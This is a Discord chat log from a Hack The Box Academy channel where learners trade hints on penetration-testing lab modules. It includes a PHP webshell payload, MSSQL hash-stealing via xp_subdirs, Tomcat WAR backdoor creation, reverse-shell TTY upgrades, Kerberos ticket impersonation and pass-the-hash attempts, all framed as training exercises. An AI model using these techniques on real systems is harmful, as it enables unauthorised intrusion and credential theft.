#modules

1 messages · Page 58 of 1

neon depot
#

like that?

vital adder
#

yep

neon depot
#

what is wrong???

shadow canopy
#

mssqlclient.py username@target-ip -windows-auth
mssqlclient.py -p 1433 username@target-ip

vital adder
#

oh wait forgot you need domain syntax

vital adder
neon depot
#

give me one second

#

I am generating new target

fathom pendant
#

can confirm everything is working as intended

neon depot
#

it has been expired so

fathom pendant
#

@vital adder that is not needed

neon depot
#

hmm,,,what should i do Mr or Ms Lee?

neon depot
#

ok i am trying to access

fathom pendant
#

either of those command syntaxes should work

#

then you run through the enumeration using the mssql format

#

instead of show databases it's select name from master.dbo.sysdatabases

#

since it's windows based; capitalization does not matter

neon depot
fathom pendant
#

don't need -ip

vital adder
neon depot
#

????

#

i am new pleasee///

#

come on

fathom pendant
neon depot
#

i know all of you is old and knew all of htb

novel matrix
#

Geez

fathom pendant
#

i only just learned this like last week as well dude

#

we are leading you to water

neon depot
#

give me the mercy

fathom pendant
#

up to you to drink it

neon depot
#

i am already drinking beer

fathom pendant
#

brother

vital adder
fathom pendant
#

just take the -ip out of your syntax

#

that's all

neon depot
#

i took it alredy no more 2

fathom pendant
#

and it should give you the prompt for a password

neon depot
#

Password:
[] Encryption required, switching to TLS
[
] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[
] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[] INFO(WIN-02\SQLEXPRESS): Line 1: Changed database context to 'master'.
[
] INFO(WIN-02\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL>

#

ok

#

whay should i move forward

fathom pendant
#

read the section

#

it tells you how to enumerate with sqlcmd/mssql

#

literally I scrolled back up and down the page to find the commands and answer

neon depot
#

?x target-ip

fathom pendant
#

i swear to god bro

neon depot
#

it is my first time to hack whatever please///

fathom pendant
#

start from the part that says "SQL syntax" on this page

#

if you STILL are stuck after an hour somehow then ping me

neon depot
#

I am pure virgin

fathom pendant
#

i'm telling you how to find the answer

#

it's on the page

sweet oar
#

What you need help with

neon depot
#

sqlcmd -S SRVMSSQL -U julio -P 'MyPassword!' -y 30 -Y 30

#

This one?>

fathom pendant
#

no

#

we are already in using mssqlclient

neon depot
#

SHOW DATABASE ?

#

i aready used to gind the

#

find

fathom pendant
#

no

neon depot
#

the password

#

wdym

fathom pendant
#

with mssqlclient we are using the command syntaxes with the black background

#

the only thing we don't need to do is type "go" afterwards

neon depot
#

EXEC master..xp_subdirs '\10.10.110.17\share'?

#

this one?

#

mercy for virgin

fathom pendant
#

you already signed in with the mssqlsvc user yeah>

neon depot
#

yes

fathom pendant
#

also you're jumping too far ahead

#

like i said

#

start from the top of the syntax section

#

look how it's telling you to find information

neon depot
#

I mean

fathom pendant
#

that part is for hash stealing using responder

#

which is the other intended way of getting the mssqlsvc password

#

that part can be ignored entirely

#

more specifically it tells you how to show databases

neon depot
#

Sorry it made me confuse a bit

fathom pendant
#

like I said take it from the TOP of that part

#

all the way up

neon depot
#

Because you mean that I have to walk through again when I got password?

fathom pendant
#

to right after it shows how to connect

#

no

#

you are logged in with mssqlsvc

#

you do not need to get another password

neon depot
#

Ye a I am

fathom pendant
#

you are the user you need to be

#

start from this part of the page

#

and work your way down

void gate
#

Module: Attacking Common Services
Section: Skills Assessment - Medium

Just finished ACS Medium after getting stuck, The key thing is thorough enumeration of the services.

Hint || -p- all ports ||

fathom pendant
neon depot
#

SQL> mysql> SHOW DATABASES;
[-] ERROR(WIN-02\SQLEXPRESS): Line 1: Incorrect syntax near '>'.
SQL>

#

sorry what do you mean sp far?

fathom pendant
#

show isn't an mssql command

#

and it looks like you copied the whole line

#

as well

#

you only ever need to copy after the > in the examples generally

#

again mssql is the linux comparable sqlcmd; so you need to go through the ones with the black background

#

as those will be the commands that will help you

#

mysql commands are only for mysql/mariadb servers

#

so the lines you're looking for start with 1>

neon depot
#

Ok l with

fathom pendant
#

but it sounds like you also need to spend more time actually studying and taking down notes in general
as I was able to find this information readily available on the page
it sounds like you are just trying to blitz through all the content and not actually learn anything
being a "virgin" or "noob" is not an excuse. not taking good notes will only hurt you in the long run

#

being frustrated at something taking time is normal; but to learn you need to really evaluate how you're going through content. If you genuinely need help on how to take good notes or what good note taking is you can probably google

#

for instance; nmap shows port 1433 open - states it's mssql service -> use mssqlclient.py to connect; use sqlcmd/mssql command syntax to complete. If you don't know what the syntax you need is - reread the section and take notes on things

#

as select name from master.dbo.sysdatabases is universal across pretty much every mssql interface to get a list of all databases

scenic walrus
#

Hey, I am doing the SMB chapter in the footprinting module. At the beginning, the lesson talks about creating a share on the server. It doesn't explain how to do that. I can continue on, but I am just curious if that is on purpose or not.

fathom pendant
hazy grotto
#

Can someone help with Local File Inclusion Log Poisoning? Im not sure what im doing wrong.

fathom pendant
#

everything :^)

crimson abyss
#

Hi everyone, I'm currently stuck at Attacking Common Applications - Skills Assessment II - I've found Nagios in gitlab but I dont know how to access. Please give me a hint

hazy grotto
#

For the love of god PLZ help me.

vital adder
vital adder
crimson abyss
vital adder
#

just add all vhost you found into your hosts file and check / enum each one

hazy grotto
vital adder
#

i mean the payload <?php system($_GET["cmd"]); ?> or <?php system($_GET['cmd']); ?> but i do it in burp so not sure if that will work

hazy grotto
#

I'm having a hard time getting the burpsuite part to even work.

hazy grotto
#

Ive tried with one and two quotes.

tall shuttle
#

Hello, Just wondering if on the Footprinting Academy Module - Footprinting Lab - Easy that looking at the hint to gain the credentials to the FTP server is actually required? Or is there another way to gain the credentials ie hydra brute force?

fathom pendant
#

Hydra bruteforcing I think

void gate
#

Bumping old message for help. I've just finished the hard skills assessment for the module but I just can't seem to crack this hash for the mssqlsvc user. Is this the right path?

rustic sage
#

Hi (I hope I'm in the correct channel) I'm currently doing network enumeration with nmap. I have a technical question about the status.php page in the easy/med ans hard courses (ips and ids evasion) the counter on those pages goes up and down automatically.. Even when I do not interact.. Is this normal? Sometimes it just resets at 0 and most of the time when the target spawns it's already at 5 (or so) alerts. I don't mind the challenge though...

#

Currently doing the hard one... Let's see if this one is as easy as the prev 2 😆

#

Did not interact with the host and during my writing here it skipped to 30...

#

32

#

🤣

cloud skiff
#

Does anyone know, why I'm getting a connection timed-out error?
When I am running smb_enumshares on metasploitable 3


[*] 10.0.0.4:139     - Starting module
[-] 10.0.0.4:139     - The connection with (10.0.0.4:139) timed out.
[*] 10.0.0.4:445     - Starting module
[-] 10.0.0.4:445     - Error when trying to enumerate shares - STATUS_ACCESS_DENIED
[*] 10.0.0.4:        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed```
#

metasploitable 3 and kali linux both are on the same subnet.

#

I restarted metasploitable 3 and kali linux a few times but everything same here.

tacit rose
sweet oar
tacit rose
autumn pilot
#

if you form a question, we might be able to point you to the solution

rustic sage
livid bluff
#

Hi,
I'm stuck on the engagement at host1 in the shell & payload module.
I have find the two upload vuln.
In tomcat i have tried with metasploit and with war file upload but nothing work, metasploit not open a shell and with the var file i have an error 500.
And with the second file upload is the same,
I managed to upload shells but none of them work.

hushed smelt
#

hey all present here , im new to this server

#

idk if this is the right place to message,but as i dont have permission to any other channels,im msging here

#

im a guy from India who is 16 yrs old, as a teenager it obvious that i have keen interest in learning about hacking and coding stuff

#

but the thing is that i dont evn know a single thing abt coding

#

its my greatest wish to learn hacking

#

is anyone here who could help me from zero?from the basics of everything?

#

@everyone

red obsidianBOT
novel matrix
#

@hushed smelt ^

hushed smelt
#

yes?

#

so

#

i gotta start from there

#

ok

#

done

#

thanks buddy

vital adder
#

jesus F ing christ when tf did they change that assessment?? but hint you are on the right part just remove the first 10k password from the mutated wordlist i'm dumb

vital adder
# livid bluff Hi, I'm stuck on the engagement at host1 in the shell & payload module. I have...

that part is just a simple tomcat rev shell here is a bunch of method you can use
https://www.hackingarticles.in/multiple-ways-to-exploit-tomcat-manager/

Hello Friends, today through this article I would like to share my experience “how to exploit Tomcat Manager Application” if you have default login credential

vital adder
# hazy grotto

try with the double quote try adding &cmd=id at the end you'll know if it worked

#

i 100% remember that list is 90k but i just check my and why tf is it 187k + (forgot to use sort)

#

if you make the wordlist with the sort command the cred should be just a bit over ||1k|| and it should take like a few min with hydra also try setting your TASKS number in hydra super low or else it will crash the target machine

sacred ermine
#

is there anbdy who completed medium lab common services?

#

i cannot brute force the ftp port

dim cosmos
#

just finished attacking enterprises, what a mission

#

had to peek a few times for hints unfortunately

rustic sage
#

Hello colleagues I connected to ssh but I do not see the print banner.

sacred ermine
#

try on pwnbox

livid bluff
tribal plume
#

If you're stuck where I think you're stuck--where I got stuck for a while--I got unstuck by re-reading the note on the PHP Wrappers page in that module.

rustic sage
#

hey am facing a problem, am trying to cretate a fully interactive reverse shell, i press ctrl-Z to the nc lisener, then i type stty raw -echo and then fg, but then i cant use enter to reset i get ^M

dim cosmos
#

need to hit enter TWICE

#

are you doing this on zsh or bash?

vital adder
rustic sage
livid bluff
vital adder
#

did you try multiple shell? also give the jsp_win_cmd.jsp shell a try it's at /usr/share/davtest/backdoors/jsp_win_cmd.jsp

#

before that just run zip -r backup.war /usr/share/davtest/backdoors/jsp_win_cmd.jsp to make the .war file

dim cosmos
#

not to be a smart arse bro but if you dont know what bash is, it may be best to do a few of the fundamentals modules

#

im not being smart, thats my honest advice

#

but if you want to proceed, these are my notes on this issue:

rustic sage
dim cosmos
#

If using bash on attacking machine:

stty raw -echo
fg <ENTER>

If using zsh on attacking machine:

stty raw -echo; fg <ENTER><ENTER>

#

you're probably using zsh

#

so try that

#

(i assume you've done something like python3 -c 'import pty; pty.spawn("/bin/bash")' in your session ?

dim cosmos
#

ok, then i would do stty raw -echo; fg <ENTER><ENTER>

rustic sage
dim cosmos
#

good luck!

livid bluff
vital adder
#

the only 2 shell i got in my note is that and java/jsp_shell_reverse_tcp

rustic sage
dim cosmos
#

awesome mate well done

#

HTB academy didnt teach the slightly different approach for zsh

#

thats why it is in my notes lol

rustic sage
#

Hello colleagues I connected to ssh but I do not see the print banner to answer the CLI windows question.

livid bluff
vital adder
#

no idea

#

give me a sec i'll give that a try

tidal compass
#

Hello folks! I'm stuck a bit. Could someone lend a hand. Here's the info. I'm on the SQL map Essentials module. Attack tuning section. Question 2. "What's the contents of table flag6? (Case #6) " The hint is, Use the prefix '`)'. I've used that prefix. I've tried everything. The vulnerable parameter is COL and is a GET request. I will find that the parameter is vulnerable, but before I have a chance to dump any info I get booted from the server. I'm assuming because I'm running too high risk/level but that is the only way I'm finding a vulnerability. Can anyone give me some insight please?

lethal atlas
livid bluff
tidal compass
livid bluff
hasty solar
#

Hi Im stuck in FOOTPRINTING, IMAP / POP3 & Footprinting Lab - Medium, firstly in IMAP I aaccess to the service using claws-mail an got the second flag, also tried accessing utilizing openssl and only found that flag, im stuck in this question + 1 Enumerate the IMAP service and submit the flag as the answer. (Format: HTB{...}), secondly in the medium lab i found creds in nfs, enumerated smb and found creds for user sa, tried to access rdp and couldnt what should i try next?

broken mauve
#

im trying to connect to the machines but im not getting any live hosts

#

im connected to the eu location

#

not sure what im doing wrong

#

using the "lab_" vpn config I am able to connect to machines right?

hasty solar
tidal compass
# lethal atlas how are your framing your command

WOW. I've been struggling with that one for a while. I try a new command today after some thought. Then post here. Annnnd found the flag. lol. Perhaps I should have posted here first and it would have made the hacker gods happy and worked lol. Thanks everyone.

broken mauve
#

By the way thanks a lot

hasty solar
#

those machines are in labs

broken mauve
#

weird

#

so why do you think its not giving any connection

vital adder
lethal atlas
vital adder
hasty solar
lethal atlas
#

imap\

#

I used the method from the first question to answer the next 2

hasty solar
#

with openssl or nmap?

livid bluff
lethal atlas
#

I actually used curl on the first

lethal atlas
vital adder
hasty solar
#

ok

livid bluff
dim cosmos
#

do pwd and start working from there

vital adder
#

that or this old shell is dumb

#

i think a meterpreter shell is better although you just need to run 2 commmand

livid bluff
#

pwd it's was my first reflex but not work ^^

dim cosmos
#

looks borked

#

get a better webshell kek

vital adder
#

the only reason i use and suggest this stupid shell is the given attack box don't have access to the internel so to be able to get a better shell you have to download it on to your or the pwnbox machine and then upload it on to the given attack box and then the taget

#

and this is the only default working shell (jsp for windows) that i can find

livid bluff
#

I have tried with another webshell but when i submit a command i have a 404 ... kek

dim cosmos
#

what module is this?

livid bluff
#

The live engagement in SHELLS & PAYLOAD

#

host 1

dim cosmos
#

oh yeh, that bloody shitty foothold one

#

i didnt take extensive notes sorry

#

id suggest a different webshell tho

livid bluff
#

Thanks i will continue for find the solution.

lethal atlas
modest isle
#

Hello guys

livid bluff
lethal atlas
modest isle
#

I need help with the Windows Fundamental module, section (Introduction to windows)

Just did the xfreerdp thing and remotely accessed the machine but can't find the answer to the questions asked

modest isle
modest isle
rustic sage
dim cosmos
#

Get off the roids, the last thing you need going thru cpts is roid rage 😜

#

Computer parts will be breakinf

rustic sage
#

hahahahahahhahahaha, 2 monitors down

#

3rd is standing strong so far

modest isle
lethal atlas
tiny juniper
#

Hi

rustic sage
#

How can I authenticate on the user1 machine in windows to answer it does not come up as logged in?

lethal atlas
rustic sage
#

introduction to windows command line

#

the user1

#

SSH to with user "user1" and password "previous flag"

#

At the moment of authentication it does not allow me to continue with the following question

#

I remain in the banner but it denies me access.

elfin nacelle
#

Hey were you able to figure this out?

lethal atlas
rustic sage
#

thank you

#

@lethal atlas thanks

lethal atlas
lethal atlas
worldly jewel
#

anyone get errors when trying to copy/paste from pwnbox to windows victim via xfreerdp?
[WARN][com.freerdp.client.x11] - failed to get clipboard data in format UTF8_STRING [source format CF_UNICODETEXT]

rustic sage
#

@lethal atlas I tried that way with the answer and in fact I can no longer access the first ip.

lethal atlas
rustic sage
#

Permisión denied

lethal atlas
#

hmmm let me log in and start that module.

elfin nacelle
#

Stuck for a couple days. Can someone please help me with the Command Injection Module Skills Assessment?

elfin nacelle
iron basin
#

Howdy, if anyone needs help please feel to dm me! I sometimes get busy so forgive me if it takes time to respond. Putting the names of the modules I have completed for people searching for help can find this message:

Modules completed:

Getting Started, Network Enumeration with Nmap, Footprinting, Information Gathering - Web Edition, Vulnerability Assessment, File Transfers, Shells & Payloads, Using the Metasploit Framework, Password Attacks, Attacking Common Services, Using Web Proxies, Attacking Web Applications with Ffuf, Login Brute Forcing, SQL Injection Fundamentals, SQLMap Essentials

light rune
#

Hey, I'm doing the linux fundamentals module and after logging in to the target via ssh its asking me "What is the name of the network interface that MTU is set to 1500?". I have no idea what this means, I'm fine with doing some googling but I've already done that for the previous 4 questions and its getting a bit tiring, am I missing something or does hack the box just give you a question without telling you how to answer it and then expect you to google for half an hour to find it?

opal jewel
#

I am on Remote Pass Attack - Network Services and having issues with WinRM user:pass. The rest of services were fast and easy. I did notice default port 5985 to open up here and there but winrm is running on a much higher port. Am I chasing a ghost?! I have narrowed down to 2 possible users that have access to winrm and neither of those are cracking.

#

Update: Make it 1 user, since he is in a particular local group. Had his password all this time but no luck logging in via evil-winrm

empty ore
#

Hello!
I joined HackTheBox academy today and so far the fundamentals are a blast. I started browsing the various paths and modules and am a bit unsure of which is best suited for me. Do any of you have a path/module recommendation if I want to focus on writing websites as securely as possible? I'm more interested in the defensive aspect. Thanks in advance!

#

I'm currently doing 'Web Requests' and am thinking of following it up with either 'Introduction to Web Application' or 'Javascript Deobfuscation'. Are there perhaps any other relevant modules anyone can recommend?

kind turret
arctic sentinel
#

Hello! I`m working the bash scripting, currently stuck with this section, can anyone give me some guidance in the flow control loops section?

#

The question is this one: Create a "For" loop that encodes the variable "var" 28 times in "base64". The number of characters in the 28th hash is the value that must be assigned to the "salt" variable.

#

I can`t copy the script cause it's very long... has anyone done this module?

devout cliff
#

can anyone give me some help in the attacking common applications module? im on the joomla section where it wants you to exploit using the joomla_dir_trav.py script and it will not run for me. says that the module 'click' is not installed. i try to install using sudo pip install click or sudo pip3 install click. both say click is already installed but for python3. the module wants you to use the script in example as python2.7 since it doesnt work for python3. how have people been able to work around this?

arctic sentinel
devout cliff
# empty ore Hello! I joined HackTheBox academy today and so far the fundamentals are a blas...

I would add to what @kind turret said and say if you are looking not at the web side but looking for internal blue team oriented modules i would check out the Certified Penetration Testing Specialist path. both CBBH and CPTS has a bit of overlap but then divert in what is taught to specialize in one or the other. so either one you choose you can always go back to the other and have a headstart on some of the things the other path will teach you.

I would recommend to be thorough in taking notes as the material can be rather dense at times and sometimes not intuitive for people.

opal jewel
light rune
#

and then it just moves on as if you actually learned something

arctic sentinel
rustic sage
#

Can anyone help me with Pass the ticket from Linux? I am doing "Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio."

#

this question and successfully got the flag.txt but seems like flag is not working

flat patrol
autumn pilot
#

you need to download the file from smb

rustic sage
#

i downloaded the flag

autumn pilot
#

and locally you can read it

rustic sage
#

and i correctly got the flag but its not working

autumn pilot
#

check for white spaces

opal jewel
#

For those running with issues using evil-winrm. Make sure to compile needed readline feature for your specific ruby version. Under Remote Path Completion on their github page.

rustic sage
#

can i dm you @autumn pilot

autumn pilot
#

not sure how much it will help, but go ahead

light rune
fathom pendant
#

does it not tell you about the ip a command?

light rune
#

I get doing your own legwork but I don't see the point when you're not even told what the legwork you're doing means

autumn pilot
#

everything that you do in cybersecurity you will have to research

flat patrol
fathom pendant
#

5-10 is a lot better than 30m to 5 hours

opal jewel
#

I just spent 2 hours troubleshooting evil-winrm :puphyper: shit just happens sometimes kek

light rune
#

instead it just says go do this and find this and moves on without explaining at all what you just did

autumn pilot
#

it does teach you cybersecurity

#

don't expect to be spoonfed

light rune
#

I dont

opal jewel
#

forkfeeding soup

light rune
#

but I expect to be told what im doing instead of it just moving on after I completed an exercise

autumn pilot
#

you are free to do the research

#

it is up to you if you want to do it at the end

#

for example

light rune
#

then whats the point of using hack the box if it doesnt teach it to you and instead just gives you a few prompts, doesnt explain it at all and then asks $450 a year to continue?

fathom pendant
#

from the top of the page

flat patrol
light rune
fathom pendant
#

it's a minor thing; mostly used for getting your IP for reverse shells, and the IP of jump/pivot machines so you can do port forwarding magicks

light rune
#

Its like if I was to teach someone how to speak french and taught them how to conjugate a verb in the imparfait without explaining when you will use that tense or why its important

autumn pilot
#

is french an universal language like the one computers are using?

fathom pendant
#

you're making a mountain out of a molehill on this issue dude

light rune
flat patrol
#

Good Luck everybody, misery loves company, I'm going back to my studies.

autumn pilot
#

look, rather spending the time to rant you could have spent the time to research and learn something new

light rune
#

So you guys dont see any issue with paying $450 a year to be 'taught' something and then being told to do all the research yourself?

fathom pendant
#

dude this is a fundamental course; it's not a big issue - the more in-depth courses tend to be better at explaining

autumn pilot
#

that module doesn't cost $450

light rune
fathom pendant
#

and that is 1 module out of the dozens

light rune
#

go back up to my original comment I just wanted to know if this would be consistent throughout the rest of the modules

autumn pilot
#

on top of that you are free to provide a feedback, but most probably provided in discord will get lost

fathom pendant
#

also after each module there is a "provide feedback" option

light rune
#

My bad, I was wondering if the entire experience with the rest of the modules would be the same, even with the payed ones

graceful rampart
fathom pendant
#

then learn better phrasing; it will help you ask better questions as well

light rune
graceful rampart
#

Because of how quickly things change in cybersecurity, it's nearly impossible to always give you every single piece of info you'll need.

light rune
fathom pendant
#

it's giving you a taste of sometimes you'll be given 90% of the way to solve the problem - the other 10% can be inferred. Tools are often talked about in the module or section

#

like I screenshot and showed; it talked about the ip command

light rune
#

yea it talked about the command, but it didnt tell me what I was doing when I found the name of the network interface that had the MTU set to 1500, it just said go do it

fathom pendant
#

and most commands also have a man <command> or <command> -h

light rune
cosmic sail
#

Fuck Dante Labs people keep trolling and shit

#

I want my money back

fathom pendant
#

ok then I'll break it down for you:
Say you need to scan for other hosts on an internal network to port forward/pivot to, you will need that Internal IP to come back to not the 10.x.x.x one.
ip a tells you every network interface that is connected - usually with htb you'll see a tun0 or something that's the <spawned ip> then other interfaces, sometimes one, sometimes 2

fathom pendant
fathom pendant
#

coming into the academy modules chat and bitching about it does you absolutely nothing lol

cosmic sail
#

Yes it does

fathom pendant
light rune
fathom pendant
light rune
#

I hope so

fathom pendant
#

and "just asking you to answer a few questions" sure if you don't read the section that the question contains

light rune
fathom pendant
#

because it's rarely ever needed unless in situations where you need to pivot; and the modules that do talk about it talk more about the importance

autumn pilot
#

the importance is that once you progress further you might see a computer that has both an external and internal networks

light rune
#

alright

empty ore
#

@kind turret @devout cliff thank you both for the suggestions. Will look into this!

lucid moth
#

hey guys

#

lol

#

yh i clicked the link

fathom pendant
#

<@&861185840277487616>

low girder
fathom pendant
#

Looks like they may have deleted

low girder
#

Hmm other mod deleted it

iron basin
#

Wassup? I have finished the module

foggy light
#

I need some help
Q. Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_).
Module: PtT from Linux

|| I found the location of /etc/krb5.keytab. exported it export KRB5CCNAME=/etc/krb5.keytab Then tried impersonate with kinit LINUX01$.INLANEFREIGHT.HTB -k -t /etc/krb5.keytab ||

But I get this error

||kinit: Keytab contains no suitable keys for LINUX01$.INLANEFREIGHT.HTB@INLANEFREIGHT.HTB while getting initial credentials ||

iron basin
#

@foggy light Where else are they stored?

foggy light
fathom pendant
iron basin
#

@foggy light There is another location that stores valuable info on kerberos info/creds

#

Login Brute Forcing - Skills Assessment Service Login:

Anyone mind providing some help? I understand the proper path but still the brute forcing is taking longer than I know it should. Just wanna make sure I am doing it right!

fathom pendant
#

Tip: cry 🙃

iron basin
#

already pass that 😛

foggy light
#

guys. I might be blind or something. cant find anything

#

😢

west rampart
#

cry harder

iron basin
#

kek, look at the sections notes, the useful info will be under the crontab sections

fathom pendant
#

Then do the find to find what folder it is (without the 'd')

foggy light
#

can I DM you ? @fathom pendant

fathom pendant
#

The other thing you can do is look closely at the example images

#

I'm not at my computer

iron basin
foggy light
#

the other thing i found is this

iron basin
#

nein

#

@foggy light Look at the finding ccache files section

foggy light
#

As far as i Know mainly 2 location have ccache file || /tmp and /etc/ ||

iron basin
#

@foggy light see if you can use the find command to find any files pertaining the word ccache

#

also, one reason why you cant use those files is because they're locked from you. but theres a user that can read those files that you have access to(should've already compromised that user if you done the previous quesitons). the hint to what user that is can be found in the output of the realm command, see what groups have access to the machine

rustic sage
#

Hello Can I ask for help on Protected Files?

#

it says I need to use cracked password for Kira but seems like there is no credentials with Kira

#

should I crack it using hydra?

fathom pendant
#

Also lowercase

dusty coral
#

Hi, I just pay for subscription and got confirmation from paypal, but it is not activated in my account. Any idea why ?

hazy grotto
unreal grail
#

@sinful falcon Experiencing the same problem!

neat charm
#

Hi @pastel ginkgo , that was an interesting comment that , you first used intruder to filter out the payloads that were working and then selected those payload to use again in intruder to browse to the each generated URL. How were you able to do that? I googled and read portswigger document but only find pre-processing actions..none were we can combine payload -> pass run-following-action.. kind of method. Could you please share?

thorn urchin
#

easier if you use ffuf and not burps slow ass intruder

neat charm
# thorn urchin you just use the same list, once on upload and then once for checking for shells...

I was able to get long list of payload (many-char-bypass X 5-6 PHP extensions) so kind of 100+ payloads which got uploaded, so first problem i was facing was that to get this list of payload which passed (as there were many which didnt). Tried alot to find a way to get a way to copy only the passing payload from intruder. Then when i wrote to you , i was thinking in wrong direction that while checking the URL (with payload) , i need to only keep URL till php/phtml/pht and remove special chars (like &,.../ , X00)...realized i was wrong. And finally able to solve the excercise.

Thanks for responding. I agree using intruder is slow in community, but i am using a profession burp..so it was not a problem for me

thorn urchin
#

burp pro is super overkill for these modules but hey whatever floats your boat and doesnt sink your rubber ducky

thorny wadi
#

how do i get the list of groups in AD im part of through CME ?

fathom pendant
#

i think cme has the -x or -c syntax that you put at the end to have it run a specific command once it finds/uses a valid login

dim cosmos
#

hi everyone

low mica
#

can someone help with the password attacks module. im on the active directory part. i have made copies of the NTDs.dit file and im tryin to file share it back to my host machine. but im getting the same error

fathom pendant
#

as in \\yourip\share\filename

magic valve
#

I’m a little lost on Attacking Common Services: Attacking email services. I’ve attempted to utilize smtp-user-enum with the provided resource username list from the module but none of those usernames exist.

fathom pendant
#

i think

low mica
#

its specified "cmd.exe /c move C:\NTDS.dit \10.10.14.177\CompData"

magic valve
low mica
#

is this what you mean?

magic valve
# fathom pendant do a full port scan

I see 3389 open but would need creds/hash to connect. Attempted previous creds/hash from previous sections. Didn’t work. Pop3 and imap open but would need credz as well or am I wrong? Found the domain with full port scan and mapped it to the target ip address and attempted the smtp-user-enum with that domain but didn’t work.

void gate
magic valve
void gate
magic valve
flint steppe
#

Hey all, working on the kernel exploit module for linux priv esc. Can't seem to compile the exploit on my Kali box, or when I can I can't get it to run on the target. Error message when I try to run on the target:
htb-student@NIX02:~$ ./exploit1
./exploit1: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./exploit1)

#

Trying to figure out what I need to tweak here. Tried installing a updating a few different things

fathom pendant
#

google it is the short answer

#

literally the first thing you should do is ask google; if google is not providing a sufficient answer then ask elsewhere such as #1024429874246590575 as it is not necessarily tied to a module and they want to keep this chat as on-topic to module content as possible

analog tendon
rustic sage
#

Hey i have an idea that would make profit. I want to make it happen.

I need someone who can code.

I need bot that does basic stuffs.

fathom pendant
analog tendon
fathom pendant
#

the DefaultCreds-Cheat-Sheet is useful

analog tendon
#

got it thanks. i guess it failed the install a few times so i had to run it from the folder.

fathom pendant
#

yeah

#

good thing mysql only had a few

fringe veldt
#

Hello, I am having great difficulty completing the PassTheHash topic in password attacks module. I am stuck on the last step where you have to setup a nc.exe on the host machine to pass the hash and connect to another machine on the domain. I have followed the steps exactly, but no RS is connecting. I have type 'ipconfig' and tried to use both IPs that were there. I have tried to use Different PS Reverseshell scripts but no avail. I have tried different ports, but nothing works. Looks like the domain firewall is off so I dont see why the RS is not working. Not sure where to go from here, seems like someone in the forum couldnt get a RS either and used LOLbins to somehow connect to the target. Any help? thanks so much, dm me plz

pseudo ledge
#

Password Attacks - Hard Lab
I got the file .vhd on my linux machine and I'm not sure how to continue? please if anybody could help me here or in dms I'd really appreciate it🙏

iron patio
#

Hey, I'm doing nmap's medium lab, the one where you find a host's DNS service number, and I think I'm doing the correct thing but nothing's happening

#

actually I think I might have something?

crimson walrus
#

File Transfers - Protected File Transfers
I want to transfer Invoke-AESEncryption.ps1 to a Windows host that is not connected to the internet so I cant download the script directly from the win host. I am connected to the host via rdp. What I want to do is download the Invoke-AESEncryption.ps1 to my kali machine and then transfer it to the victim. However, I cannot seem to download the script to kali. It always downloads the html file of the page instead of the script. How can I download just the script? Thanks in advance!

proud pine
proud pine
#

It doesn't look like this site offers any raw download method. You'd have to either rig something up to extract the data, or manually copy/paste it.

crimson walrus
#

Yeah, indeed. I was just wondering if there's some clever way to do that. Maybe also via github since I found the same script there.

turbid tartan
#

I have problem crackmapexec doesnt go trough the list. Instead it just takes it as the username

proud pine
turbid tartan
#

i did that

proud pine
#

I mean completely full path, with the /opt/useful/etc...

weak bluff
#

Hello everyone, im trying to verify over #bot-commands but i can't find my HTB Academy account token on the website, all i see is student id

autumn pilot
#

there isn't one, the discord token is only available on accounts created on hackthebox.com

rustic sage
#

Is anyone goood at automation?

turbid tartan
weak bluff
rustic sage
lucid veldt
#

I'm trying to run responder and inveigh in the AD Enumeration & Attacks - Skills Assessment Part I lab, but I'm not able to. What am I missing? Should I convert inveigh.ps1 to Inveigh.exe?

proud pine
lucid veldt
proud pine
#

and what did you get from inveigh?

lucid veldt
brave barn
#

I have the same problem...for two weeks. Any improvement?

proud pine
# lucid veldt

You might want to go back over the sections that cover using inveigh.

rustic sage
#

I'm stuck on this question I don't understand it well Use the tasklist command to print the started services and then sort them in reverse order by name. The service name starting with "vm" is the flag for this user.

#

can i help me?

spare condor
#

What was the issue here? Same problem. Can you help? god, found it...

native marlin
#

Hi ! im stuck in the "Information Gathering - Web - Skills Assessment" with the following question : 'Perform active infrastructure identification against the host https://i.imgur.com. What server name is returned for the host?' i tried with cURL, dig and nslookup , i tried on the main domain too but i cant find something relevant. Could someone give me a hand ?

rustic sage
rustic sage
frigid vector
#

Guys.
Need a little hint on Broken Authentication -skill assessment

rustic sage
#

I am just mathematician.
Strategy is going to work. 1 cent for 10 second

#

I need automation to that.

vital adder
#

yeah this is not the place for that

vital adder
frigid vector
#

I found some users and their passwords,

vital adder
vital adder
vital adder
frigid vector
#

yeag

frigid vector
#

but I dont know how to enumerate the role)

vital adder
#

it's also ||md5|| 🤣

#

i think what you have got is the role

frigid vector
#

I don't know why:)

frigid vector
rustic sage
vital adder
#

hint just are ||missing 1|| thing

rustic sage
#

Use the tasklist command to print the started services and then sort them in reverse order by name. The name of the service that begins with "vm" is the flag for this user. i don´t undestand

frigid vector
rustic sage
vital adder
rustic sage
#

@vital adder That is the question

#

But I list the services with tasklist and I find the .exe with the initials "vm" but the flag does not appear.

vital adder
#

which module and section are you on?

rustic sage
#

I think something else is missing because I have tried to do several things but I don't see an answer.
@vital adder

#

INTRODUCTION TO WINDOWS COMMAND LINE

#

-->skills asseessment

#

@vital adder user9 question

vital adder
#

so you was doing it on the DC right?

rustic sage
#

yes

vital adder
#

flag is the .exe file name

rustic sage
#

no

spare condor
#

@forest tapir @rough thunder Can I DM you about this one?

forest tapir
#

sure.

buoyant drum
#

Hi, I need some help with AD Enum & Attacks.

proud pine
#

There's only 3 possible options, so worst-case, you can bruteforce it lol

#

All 3 failed?

buoyant drum
ruby elbow
#

Hi everyone! how you doing? Any hint on the "Guessable Answer" from Broken Authentication module,
question: Reset the htbadmin user's password by guessing one of the questions. What is the flag?

clever imp
#

XXS module

